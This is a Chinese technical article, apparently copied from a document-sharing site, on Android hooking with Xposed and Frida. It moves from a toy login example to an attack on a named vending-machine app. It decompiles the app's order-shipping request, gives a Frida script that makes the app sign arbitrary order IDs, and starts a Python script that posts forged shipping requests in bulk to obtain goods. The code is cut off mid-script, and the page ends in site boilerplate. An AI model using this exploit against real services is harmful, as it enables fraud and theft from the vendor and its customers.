版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
【移动应用开发技术】浅谈androidhook技术
Xposed在开机的时候完成对所有的HookFunction的劫持,在原Function执行的前后加上自定义代码,很多人将这个框架用在对android的私有化定制上面,其实在android安全测试方面这个框架提供了很大的便利,xposed主要是对方法的hook,在以往的重打包技术中,需要对smali代码的进行修改,修改起来比较麻烦。利用xposed框架可以很容易的获取到android应用中的信息,比如加密私钥、salt值等等,不需要反编译获取密钥转换算法、不需要了解密钥保存机制,直接hook函数,获取输入输出就可以。原理
在Android系统中,应用程序进程都是由Zygote进程孵化出来的,而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例,每当它孵化一个新的应用程序进程时,都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去,从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。Zygote进程在启动的过程中,除了会创建一个Dalvik虚拟机实例之外,还会将Java运行时库加载到进程中来,以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意,一个应用程序进程被Zygote进程孵化出来的时候,不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝,还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native(JNI)方法hookMethodNative,这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析,不得不说,作者对于android的机制和java的了解已经相当深入了。简单实例
很简单的一个android登入代码:
publicclassMainActivityextendsAppCompatActivity{private
TextView
accountView;
private
TextView
passwdView;
private
Button
loginBut;
private
Button
quitBut;
@Override
protected
void
onCreate(Bundle
savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
accountView
=
(TextView)
findViewById(R.id.account);
passwdView
=
(TextView)
findViewById(R.id.pwd);
loginBut
=
(Button)
findViewById(R.id.login);
quitBut
=
(Button)
findViewById(R.id.quit);
loginBut.setOnClickListener(new
View.OnClickListener()
{
@Override
public
void
onClick(View
v)
{
String
username
=
accountView.getText()
+
"";
String
password
=
passwdView.getText()
+
"";
if(isCorrectInfo(username,password)){
Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();
}
else{
Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show();
}
}
});
}
public
boolean
isCorrectInfo(String
username,
String
password)
{
if(username.equals("admin")
&&
password.equals("passwd")){
return
true;
}
else{
return
false;
}
}}
很简单的就是判断下用户输入的用户名和密码是正确,这里做个简单的演示,将用户输入的用户名和密码信息hook出来不管正确与否
简单说下xposed模块的开发,首先需要的是导入api,具体的可以参考:/rovo89/XposedBridge/wiki/Using-the-Xposed-Framework-API
在manifest中定义
importfrida,sys#引入frida类
importlogginglogging.basicConfig(filename=’test.log’,level=logging.INFO)reload(sys)
sys.setdefaultencoding(‘utf-8’)#对输出进行utf8的编码
printsys.getdefaultencoding()defprint_result(message):#对输出的信息进行打印
printmessage
(message)defon_message(message,data):#反调函数,用来接受message的信息,message后面会说到
try:
print_result(message=message)
except:
passdid=“255601452”#订单id
time=“1472706588”#时间戳jscode=“””#核心代码,这段主要是调用app中的相应处理函数,后面会分析这段代码的来源Dalvik.perform(function(){#说明是Dalvik平台
varcurrentApplication=Dalvik.use(“android.app.ActivityThread”).currentApplication();
varcontext=currentApplication.getApplicationContext();
varsignclass=Dalvik.use(“com.ub.main.d.e”);#调用com.ub.main.d.e类
varsignInstance=signclass.$new(context);#反射创建一个新的对象
varsign=signInstance.a(“255601452”);#调用对象的a函数
send(sign);#将调用函数的结果发送出来
});
“”“process=frida.get_device_manager().enumerate_devices()[-1].attach(“com.ub.main”)#获取连接的设备并枚举取最后一个设备连接,并附到com.ub.main的进程上面printprocessscript=process.create_script(jscode)#调用相应的js函数,获取函数调用后的结果值
script.on(‘message’,on_message)#利用回调,将message传递给on_message函数
print“done”
script.load()反编译获取app中的核心函数
对于上面的js代码,其实就是调用app中的某个函数,比如sign值生成函数,加密解密函数,不需要自己单独的去分析算法流程,分析key值在哪,直接调用app的相应函数,让app帮我们完成这些工作
这里我们分析的app是友宝,这是一款饮料售货机,当时抓包看到提货的时候是只有个订单id的,猜想是不是遍历订单的id,支付成功但是没有取货的订单会不会响应请求,自己掉货出来
下面对友宝的订单进行分析过程1、抓取支付订单成功链接
/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4
postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh4rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588分析:sign是校验值,主要是防止订单伪造的,orderid是产生的支付订单id,这个主要是防止伪造用2、反编译友宝app
找到morder/shipping所在的包为:com/ub/main/d/e.class
其中localStringBuffer存储的就是url中的参数信息,该请求查找到的代码在a()
StringBufferlocalStringBuffer=newStringBuffer();
localStringBuffer.append(“clientversion”);
localStringBuffer.append(“=”);
try
{
localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(),0).versionName));
localStringBuffer.append(“&”);
localStringBuffer.append(“machine_type”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(Build.MODEL));
localStringBuffer.append(“&”);
localStringBuffer.append(“os”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));
localStringBuffer.append(“&”);
localStringBuffer.append(“channel_id”);
localStringBuffer.append(“=”);
localStringBuffer.append(this.g.u());
localStringBuffer.append(“&”);
localStringBuffer.append(“device_no”);
localStringBuffer.append(“=”);
ObjectlocalObject1=“”;
try
{
Stringstr5=Uri.encode(i.a(this.e));
localObject1=str5;
}
catch(ExceptionlocalException1)
{
ObjectlocalObject2;
for(;;){}
}
localStringBuffer.append((String)localObject1);
localStringBuffer.append(“&”);
localStringBuffer.append(“imei”);
localStringBuffer.append(“=”);
localObject2=“”;
try
{
Stringstr4=Uri.encode(i.b(this.e));
localObject2=str4;
}
catch(ExceptionlocalException2)
{
booleanbool;
Stringstr1;
Stringstr2;
Stringstr3;
for(;;){}
}
localStringBuffer.append((String)localObject2);
localStringBuffer.append(“&”);
localStringBuffer.append(“device_id”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(“2”));
localStringBuffer.append(“&”);
localStringBuffer.append(“u”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(this.f.c()));
localStringBuffer.append(“&”);
localStringBuffer.append(“wake_id”);
localStringBuffer.append(“=”);
localStringBuffer.append(“0”);
localStringBuffer.append(“&”);
localStringBuffer.append(“net_type”);
localStringBuffer.append(“=”);
localStringBuffer.append(i.g(this.e));
localStringBuffer.append(“&”);
localStringBuffer.append(“carrier_type”);
localStringBuffer.append(“=”);
localStringBuffer.append(i.h(this.e));
bool=this.f.f();
str1=this.f.l();
str2=this.f.m();
if(bool)
{
str3=“4”;
l.a(“weipeipei”,“get参数—->isUboxAccount=”+bool+“,s=”+str3);
localStringBuffer.append(“&”);
localStringBuffer.append(“s”);
localStringBuffer.append(“=”);
localStringBuffer.append(str3);
returnlocalStringBuffer.toString().trim();
}
}
catch(PackageManager.NameNotFoundExceptionlocalNameNotFoundException)
{
for(;;)
{
localNameNotFoundException.printStackTrace();
continue;
if((str1!=null)&&(!str1.trim().equals(“”))){
str3=“2”;
}elseif((str2!=null)&&(!str2.trim().equals(“”))){
str3=“3”;
}else{
str3=“0”;
}
}
}
}
生成签名的函数在com/ub/main/d/e.class中的b函数
publicStringb(String[][]paramArrayOfString)输入的是一个array
上面的请求函数在:
publicStringa(StringparamString)
{
String[][]arrayOfString=newString[2][];
arrayOfString[0]={“orderId”,paramString};
String[]arrayOfString1=newString[2];
arrayOfString1[0]=“timestamp”;
arrayOfString1[1]=d;
arrayOfString[1]=arrayOfString1;
returnb(arrayOfString);
}最后加上sign值,发送请求3、可以反编译出他的sign计算方法,也可以直接调用b函数来产生sign值,后来发现app会自动取时间戳,我们就不需要给他array型的参数,直接调用a函数,把orderId给他,让他直接return一个值出来就好了,就有了上面的js代码4、自动化的批量处理
看代码importfrida,sys
importlogging
importrequestslogging.basicConfig(filename=’test.log’,level=logging.INFO)reload(sys)
sys.setdefaultencoding(‘utf-8’)classubox:
def
init(self):
passdef
request(self,
payload):
#
"requests"
dict
=
{}
url
=
"/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"
for
i
in
payload.split("&"):
key
=
i.split("=")[0]
value
=
i.split("=")[1]
dict[key]
=
value
data=dict
r=requests.post(url=url,data=data)
r.text
def
print_result(self,
message):
#
message
payload
=
message["payload"]
payload
self.requ
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 铜基、镍基钎料项目可行性研究报告及运营方案|瑞克咨询|2024年编|
- 五年高考高考英语真题分项详解 专题07 语法填空(含解析)-人教高三全册英语试题
- 江苏省大丰市高考政治第一轮总复习 第12讲 文化与社会重难点梳理课后练习-人教高三全册政治试题
- 有机化学原料项目市场研究报告及运营管理方案|瑞克咨询|2024年编|
- 2024年服务行业技能考试-上海大众认证销售顾问笔试参考题库含答案
- 2024年操作工技能考核考试-手工造型工笔试参考题库含答案
- 2024年建筑继续教育-咨询工程师继续教育笔试参考题库含答案
- 2024年岗位知识竞赛-飞行签派员知识竞赛笔试参考题库含答案
- 2024年安防生产行业技能考试-烟花爆竹笔试参考题库含答案
- 2024年大学试题(财经商贸)-金融营销学笔试参考题库含答案
- 血氧仪项目可行性研究报告写作范文
- 人教版PEP三年级英语下册电子作业本
- 电动给水泵施工方案
- 穴位注射操作规范及流程图
- 空压机故障跳机应急演练方案
- 报价单模板word
- 变电工程综合单价表(安装部分)
- 残疾人精准康复工作自查报告
- Sentaurus在ESD防护器件设计中的应用PPT课件
- 今天你安全吗
- 血浆、血小板成分血的临床应用和评价(邱艳)
评论
0/150
提交评论